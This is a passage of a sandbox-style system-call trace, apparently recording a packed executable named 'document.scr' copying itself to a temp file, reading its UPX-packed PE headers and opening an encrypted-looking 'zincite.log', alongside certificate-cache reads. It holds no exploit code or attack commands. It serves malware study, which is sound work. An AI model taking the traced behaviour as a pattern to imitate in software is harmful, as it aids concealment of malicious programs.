04\x000\x00B\x00A\x005\x006\x000\x006\x00C\x00D\x00F\x000\x008\x006\x00B\x00 |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\12236C41CDDF9E40BA5606CDF086B821 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00V\x00\x00\x00\xb0#\xb0\x1f\xe0\x91\xcf\x017\xa0\x02\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00-\x00g\x002\x00-\x00c\x00r\x00l\x00.\x00t\x00h\x00a\x00w\x00t\x00e\x00.\x00c\x00o\x00m\x00/\x00T\x00h\x00a\x00w\x00t\x00e\x00C\x00S\x00G\x002\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\140B4CDED8ED877CDC65B54BA965BD39 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00D\x00\x00\x00\xf08v,\xe0\x91\xcf\x01\xcd\x07\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00s\x00t\x00a\x00r\x00t\x00s\x00s\x00l\x00.\x00c\x00o\x00m\x00/\x00s\x00f\x00s\x00c\x00a\x00.\x00c\x00r\x00t\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,278 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00\xbc\x00\x00\x00\x90\x88V\xf3\xdf\x91\xcf\x01\x12\x00\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00.\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x00u\x00p\x00d\x00a\x00t\x00e\x00.\x00c\x00o\x00m\x00/\x00m\x00s\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00/\x00u\x00p\x00d\x00a\x00t\x00e\x00/\x00v\x003\x00/\x00s\x00t\x00a\x00t\x00i\x00c\x00/\x00t\x00r\x00u\x00s\x00t\x00e\x00d\x00r\x00/\x00e\x00n\x00/\x00a\x00u\x00t\x00h\x00r\x00o\x00o\x00t\x00s\x00e\x00q\x00.\x00t\x00x\x00t\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,278 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,288 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\303572DF538EDD8B1D606185F1D559B8 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00b\x00\x00\x00\xc0t\xb9\x14\xe3\x91\xcf\x01U\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00T\x00h\x00a\x00w\x00t\x00e\x00T\x00i\x00m\x00e\x00s\x00t\x00a\x00m\x00p\x00i\x00n\x00g\x00C\x00A\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,288 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\3130B1871A126520A8C47861EFE3ED4D DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00h\x00\x00\x00\x90\xbd0\x13\xe3\x91\xcf\x01 \x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00t\x00s\x00p\x00c\x00a\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,288 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\398EE64D66758B5715368AA94044B13A DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00R\x00\x00\x00\xd0j\x13j\xe3\x91\xcf\x01\xe7\x08\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00e\x00v\x00c\x00s\x00-\x00c\x00r\x00l\x00.\x00w\x00s\x00.\x00s\x00y\x00m\x00a\x00n\x00t\x00e\x00c\x00.\x00c\x00o\x00m\x00/\x00e\x00v\x00c\x00s\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,288 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,298 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:02,298 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:02,298 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\5C45AD19E3530EC4218F560AFC04C3F7 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00Z\x00\x00\x00\x90K\xd3\x90\xe0\x91\xcf\x01\x15\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00E\x00V\x00S\x00e\x00c\x00u\x00r\x00e\x00-\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00p\x00c\x00a\x003\x00-\x00g\x005\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,298 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\60E31627FDA0A46932B0E5948949F2A5 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,298 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00B\x00\x00\x00\x80E\xf0i\xe3\x91\xcf\x01\xa5\x03\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00p\x00c\x00a\x003\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,308 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,318 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,318 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00`\x00\x00\x00P,\xcd\xb1\xe6\x91\xcf\x01\xb9\xff\x01\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00s\x00c\x003\x00-\x002\x000\x001\x000\x00-\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00C\x00S\x00C\x003\x00-\x002\x000\x001\x000\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,318 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,318 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\696F3DE637E6DE85B458996D49D759AD DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,318 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00\x80\x00\x00\x00\x80\xad\xf1\x05\xe1\x91\xcf\x01-\x03\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00r\x00o\x00o\x00t\x00c\x00e\x00r\x00t\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,318 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,328 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\7396C420A8E1BC1DA97F1AF0D10BAD21 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,328 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00\x8c\x00\x00\x00\x10C\xf6\x05\xe1\x91\xcf\x01*\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00M\x00i\x00c\x00C\x00o\x00d\x00S\x00i\x00g\x00P\x00C\x00A\x00_\x000\x008\x00-\x003\x001\x00-\x002\x000\x001\x000\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,328 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,328 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\74BFD122C0875EC75DBE5C6DB4C59019 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,328 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00`\x00\x00\x00`\x8bt\x1f\xe0\x91\xcf\x01\xecF\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00t\x00h\x00a\x00w\x00t\x00e\x00.\x00c\x00o\x00m\x00/\x00T\x00h\x00a\x00w\x00t\x00e\x00P\x00r\x00e\x00m\x00i\x00u\x00m\x00S\x00e\x00r\x00v\x00e\x00r\x00C\x00A\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,328 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,328 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\79841F8EF00FBA86D33CC5A47696F165 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,328 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00F\x00\x00\x00p5\xc7\x14\xe3\x91\xcf\x01\x9d\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00t\x00s\x00s\x00-\x00c\x00a\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,338 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,338 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\7B2238AACCEDC3F1FFE8E7EB5F575EC9 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,338 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00h\x00\x00\x00\x00\\xe4\xe1\xe2\x91\xcf\x01\xfa\x01\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00C\x00S\x00P\x00C\x00A\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,338 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,348 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,358 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00H\x00\x00\x00\xe05\x06\xa7\xe0\x91\xcf\x01\x15\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00p\x00c\x00a\x003\x00-\x00g\x005\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,358 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,358 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,358 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00\xbc\x00\x00\x00\x90\xfbn\xf3\xdf\x91\xcf\x01\xf7\xd2\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00w\x00w\x00w\x00.\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00.\x00w\x00i\x00n\x00d\x00o\x00w\x00s\x00u\x00p\x00d\x00a\x00t\x00e\x00.\x00c\x00o\x00m\x00/\x00m\x00s\x00d\x00o\x00w\x00n\x00l\x00o\x00a\x00d\x00/\x00u\x00p\x00d\x00a\x00t\x00e\x00/\x00v\x003\x00/\x00s\x00t\x00a\x00t\x00i\x00c\x00/\x00t\x00r\x00u\x00s\x00t\x00e\x00d\x00r\x00/\x00e\x00n\x00/\x00a\x00u\x00t\x00h\x00r\x00o\x00o\x00t\x00s\x00t\x00l\x00.\x00c\x00a\x00b\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,358 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,368 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\A1377F7115F1F126A15360369B165211 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,378 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00r\x00\x00\x00\x00c\x8f\x15\xe3\x91\xcf\x01U\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00C\x00o\x00d\x00e\x00S\x00i\x00g\x00P\x00C\x00A\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,378 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,378 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\A44F4E7CB3133FF765C39A53AD8FCFDD DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,378 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00v\x00\x00\x00\x80\x1e\xa7\x14\xe3\x91\xcf\x01.\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00C\x00o\x00d\x00e\x00S\x00i\x00g\x00n\x00P\x00C\x00A\x002\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,378 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,388 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\A89DFCC31C360BA5CBD616749B1B1C5D DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,388 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x006\x00\x00\x00\xe0\x19\xf2\x9b\xe0\x91\xcf\x01\xb9\xff\x01\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00s\x00f\x00.\x00s\x00y\x00m\x00c\x00b\x00.\x00c\x00o\x00m\x00/\x00s\x00f\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,388 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001ac |
FAILURE | 3221225489 | |
| 07:44:02,388 | 364 | NtCreateFile |
ShareAccess => 0 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp1.tmp DesiredAccess => 0x80100080 CreateDisposition => 2 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,398 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\B171751C11ECDD4C0C4BC4BBF7B99FBF DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:02,398 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00d\x00\x00\x000\xb0\xe8\x90\xe0\x91\xcf\x01\x0e_\x01\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00E\x00V\x00S\x00e\x00c\x00u\x00r\x00e\x00-\x00c\x00r\x00l\x00.\x00v\x00e\x00r\x00i\x00s\x00i\x00g\x00n\x00.\x00c\x00o\x00m\x00/\x00E\x00V\x00S\x00e\x00c\x00u\x00r\x00e\x002\x000\x000\x006\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:02,398 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001a4 |
FAILURE | 3221225489 | |
| 07:44:02,398 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Application Data\Microsoft\CryptnetUrlCache\MetaData\F90F18257CBB4D84216AC1E1F3BB2C76 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:02,398 | 504 | NtReadFile |
Buffer => \x18\x00\x00\x00\x01\x01\x02 \x01\x00\x00\x00\x88\x00\x00\x00\xf0\x06\x97\x15\xe3\x91\xcf\x01&\x02\x00\x00h\x00t\x00t\x00p\x00:\x00/\x00/\x00c\x00r\x00l\x00.\x00m\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00.\x00c\x00o\x00m\x00/\x00p\x00k\x00i\x00/\x00c\x00r\x00l\x00/\x00p\x00r\x00o\x00d\x00u\x00c\x00t\x00s\x00/\x00M\x00i\x00c\x00r\x00o\x00s\x00o\x00f\x00t\x00T\x00i\x00m\x00e\x00S\x00t\x00a\x00m\x00p\x00P\x00C\x00A\x00.\x00c\x00r\x00l\x00\x00\x00 FileHandle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | CopyFileA |
ExistingFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\document.scr NewFileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp1.tmp |
SUCCESS | 0x00000001 | |
| 07:44:02,408 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\tmp1.tmp DesiredAccess => 0xc0100080 CreateDisposition => 1 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtSetInformationFile |
FileHandle => 0x000001a0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => \xd8\x00\x00\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtSetInformationFile |
FileHandle => 0x000001a0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => PE\x00\x00L\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtSetInformationFile |
FileHandle => 0x000001a0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => UPX0\x00\x00\x00\x00\x00\x80\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\xe0 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => UPX1\x00\x00\x00\x00\x00`\x00\x00\x00\x90\x00\x00\x00`\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xe0 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => .rsrc\x00\x00\x00\x00\x10\x00\x00\x00\xf0\x00\x00\x00\x08\x00\x00\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\xc0 FileHandle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtSetInformationFile |
FileHandle => 0x000001a0 FileInformation => |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtCreateFile |
ShareAccess => 3 FileName => C:\DOCUME~1\TDW\LOCALS~1\Temp\zincite.log DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtReadFile |
Buffer => \x0b2}\x99\xfeL\x82m\xf4\xb7p>\x0b\xb4\x02\xdc\xf4^s\x8e\x0b\x98~I\xf4"\xd0\x00\x0b.K\x99\x95\xbez\x87\xaa\xe9\x8e'\xaa\xe9\x85\x0e\x15A\x85y\xaa\xe9\x84\x7fq\x04*m\xc3\xbf\xf3\xafe\xc3\xc2\xc6D\x18\x06\x90{O\xf9\x12\xab\x96\xd0K\xb4\xe7\x13m\xab\xd2(\xdckZ=}{O\xf8Ny\x85\xa5h\x83\xfa1\xda\xd7\xe74og@\xf6\xf1\xbc\xad\xcfal\x12\xf4\xbc\xbc\xad\xce(l \xfc\x0fg@^\x8d\xa0\x0c\x14\xab\xf4\x11\xc1cD\xb6\xa6\x94[\x03\xa0;\xf6
\xe1\xa3O\xc3\xaa-P5\xef3U\xf3\xeb:\x12r\xc0\x13\xfd\xfe\xfe\xf7\xf6\xcb\x0eZFo\x1b\x7f\xe9}t\x91\xfd,\x12\xcd\xe7\x8d?\xe9\xf6\xc8\x0f\xe0l\x8e\xb7\xaeS\xd9I4\x8846\xb8\x9c\x11x]S\xd9H\xd8\x97\x81\x03&\x9c\xb4\x9e\xb08\x93\xac"gl\x9d\x89\x88 g\xdf\x88\xa4\xf3\xa2\x88&?}\x88\xed\xa3T\x88\x05\xe9]\x97Tl\x19\x9cc,3 FileHandle => 0x000001ac |
SUCCESS | 0x00000000 | |
| 07:44:02,408 | 364 | NtWriteFile |
